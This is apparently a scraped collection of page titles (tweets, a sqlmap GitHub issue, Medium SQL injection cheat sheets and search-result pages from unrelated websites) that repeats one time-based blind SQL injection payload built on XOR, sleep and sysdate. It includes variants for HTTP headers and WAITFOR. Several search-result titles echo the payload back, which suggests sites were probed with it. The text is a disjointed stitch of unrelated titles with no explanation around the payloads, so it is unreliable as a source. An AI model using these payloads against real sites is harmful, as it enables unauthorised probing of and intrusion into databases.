NS 🍥 on Twitter: "Blind #SQLInjection on #GraphQL The API accepts queries for user "gender" data and accepts 3 keywords "M,F,NA", I found the parader "xxxkeyword_xx_xx" is vulnerable to blind-SQL injection attacks
Test Payload: 'XOR(if(now()=sysdate(),sleep(10),0))OR' · Issue #4091 · sqlmapproject/sqlmap · GitHub
Search results for: '0"XOR(if(now()=sysdate(),sleep(12),0))XOR"Z" AND 2*3*8=6*8 AND "Z0cm"="Z0cm'
Protea King Arctic Ice - 0"XOR(if(now()=sysdate(),sleep(12),0))XOR"Z - Public albums | Sierra Flower Finder
bb00x (@ihebhamad514) / Twitter
spread love on Twitter: "Time-based SQLi with two payloads injected in the following headers: 1. User-Agent: "XOR(if(now()=sysdate(),sleep(5),0))XOR" 2. X-Forwarded-For: 0'XOR(if(now()=sysdate(),sleep(10),0))XOR'Z Both payloads were executed and the ...
Hritish aka m4lch4t (@Hritish17) / Twitter
0"XOR(if(now()=sysdate(),sleep(12),0))XOR"Z :: YummyMummyClub.ca
Test Payload: 'XOR(if(now()=sysdate(),sleep(10),0))OR' · Issue #4091 · sqlmapproject/sqlmap · GitHub
Jawad ar Twitter: "Detect Blind SQL INJECTION with these payloads 0"XOR (if(now()=sysdate(),sleep(12),0))XOR"Z%20=%3E 0'XOR(if(now()=sysdate(),sleep (3),0))XOR'Z '%20WAITFOR
Is this some sort of SQL injection? : r/webdev
Search results for: '0"XOR(if(now()=sysdate(),sleep(12),0))XOR"Z'
Search results for: '0"XOR(if(now()=sysdate(),sleep(12),0))XOR"Z" AND 2*3*8=6*8 AND "YjTu"="YjTu'
Test Payload: 'XOR(if(now()=sysdate(),sleep(10),0))OR' · Issue #4091 · sqlmapproject/sqlmap · GitHub
Aimagin: Search results for: '<a href="0"XOR(if(now()=sysdate(),sleep(15),0 ))XOR"Z">_2_</a>' AND 2*3*8=6*8 AND 'sfTj'='sfTj'
Blind SQL Injection Detection and Exploitation (Cheatsheet) | by Ansar Uddin | Medium
How I Found Sql Injection on 8x8 , Cengage,Comodo,Automattic,20 company | by Ahmad A Abdulla | Medium
